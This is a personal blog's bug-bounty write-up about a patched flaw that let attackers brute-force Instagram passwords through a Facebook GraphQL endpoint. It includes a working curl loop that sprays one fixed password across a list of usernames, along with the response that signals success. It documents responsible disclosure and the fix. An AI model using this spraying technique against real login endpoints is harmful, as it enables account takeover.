<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Ability to bruteforce Instagram account’s password due to lack of rate limitation protection | Youssef Sammouda (sam0) personal blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Ability to bruteforce Instagram account’s password due to lack of rate limitation protection" />
<meta name="author" content="qw" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Description" />
<meta property="og:description" content="Description" />
<link rel="canonical" href="http://localhost:4000/2020/03/11/ability-to-bruteforce-instagram-accounts-password-due-to-lack-of-rate-limitation-protection.html" />
<meta property="og:url" content="http://localhost:4000/2020/03/11/ability-to-bruteforce-instagram-accounts-password-due-to-lack-of-rate-limitation-protection.html" />
<meta property="og:site_name" content="Youssef Sammouda (sam0) personal blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-03-11T14:33:27+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Ability to bruteforce Instagram account’s password due to lack of rate limitation protection" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"qw"},"dateModified":"2020-03-11T14:33:27+01:00","datePublished":"2020-03-11T14:33:27+01:00","description":"Description","headline":"Ability to bruteforce Instagram account’s password due to lack of rate limitation protection","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2020/03/11/ability-to-bruteforce-instagram-accounts-password-due-to-lack-of-rate-limitation-protection.html"},"url":"http://localhost:4000/2020/03/11/ability-to-bruteforce-instagram-accounts-password-due-to-lack-of-rate-limitation-protection.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Youssef Sammouda (sam0) personal blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Youssef Sammouda (sam0) personal blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Ability to bruteforce Instagram account&#39;s password due to lack of rate limitation protection</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2020-03-11T14:33:27+01:00" itemprop="datePublished">Mar 11, 2020
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">qw</span></span></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p><strong>Description</strong></p>

<p>This bug could allow an attacker to bruteforce the password of Instagram users. This happens because certain Facebook GraphQL Query implements authentication to Instagram to link the account to a certain dashboard. This endpoint seems to block the attacker after certain number of requests for a chosen Username, however, if we try the same password with different username each time, then we won’t get blocked. Exploiting this, we can distinguish the correct password from the different responses we get with each try.</p>

<p><strong>Reproduction</strong></p>

<p>To test this, send a POST request to <strong>https://www.facebook.com/api/graphql</strong> (cookies aren’t needed) with the following parameters in the body:</p>

<p><code class="language-plaintext highlighter-rouge">__a=1&lt;br&gt;&lt;/br&gt;doc_id=REDACTED&amp;&lt;br&gt;&lt;/br&gt;variables={"data":{"business_id":BUSINESS_ID,"page_id":PAGE_ID,"username":"USERNAME","password":"PASSWORD"}}</code></p>

<p>where BUSINESS_ID and PAGE_ID are both ids of random business and page ids. USERNAME is the targeted Instagram username and PASSWORD is the fixed password</p>

<p>Using curl, we can run an attack against a list of usernames with a fixed password (in this example 123456)</p>

<p><code class="language-plaintext highlighter-rouge">while read user; do curl -k -i -X POST https://www.facebook.com/api/graphql/ -H 'Content-Type: application/x-www-form-urlencoded' -d "__a=1&amp;doc_id=REDACTED&amp;variables={\"data\":{\"business_id\":RANDOM,\"page_id\":RANDOM,\"username\":\"$user\",\"password\":\"123456\"}}";done &lt; USER_LIST</code></p>

<p>where <strong>USER_LIST</strong> is a file which contains a list of Instagram usernames.</p>

<p>The response to successful authentications would be</p>

<p><code class="language-plaintext highlighter-rouge">(&lt;br&gt;&lt;/br&gt; "cm_ig_authentication": {&lt;br&gt;&lt;/br&gt;"is_authenticated": true&lt;br&gt;&lt;/br&gt;} )</code></p>

<p><strong>Impact</strong></p>

<p>A malicious user could run this against a huge list of Instagram usernames with a fixed password, after that attack is finished he changes the password. The time between each password try for a certain account is long so this would bypass the rate limitation for the password field too ( bypassing the 20 tries rate limit of the password field).</p>

<p><strong>The Fix</strong></p>

<p>Facebook fixed this by implementing rate limitation to the “username” field along with the “password” field.</p>

<p><strong>Timeline</strong></p>

<p>Feb 4, 2020 — Report Sent<br />
Feb 11, 2020 — Acknowledged by Facebook<br />
Mar 9, 2020 — Fixed by Facebook<br />
Mar 10, 2020 — Bounty Awarded by Facebook</p>

  </div><a class="u-url" href="/2020/03/11/ability-to-bruteforce-instagram-accounts-password-due-to-lack-of-rate-limitation-protection.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Youssef Sammouda (sam0) personal blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Youssef Sammouda (sam0) personal blog</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">samm0uda</span></a></li><li><a href="https://www.twitter.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">samm0uda</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>The goal of this blog is to share write-ups about bugs i have found in Facebook and reported to them under the Facebook bug bounty program.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
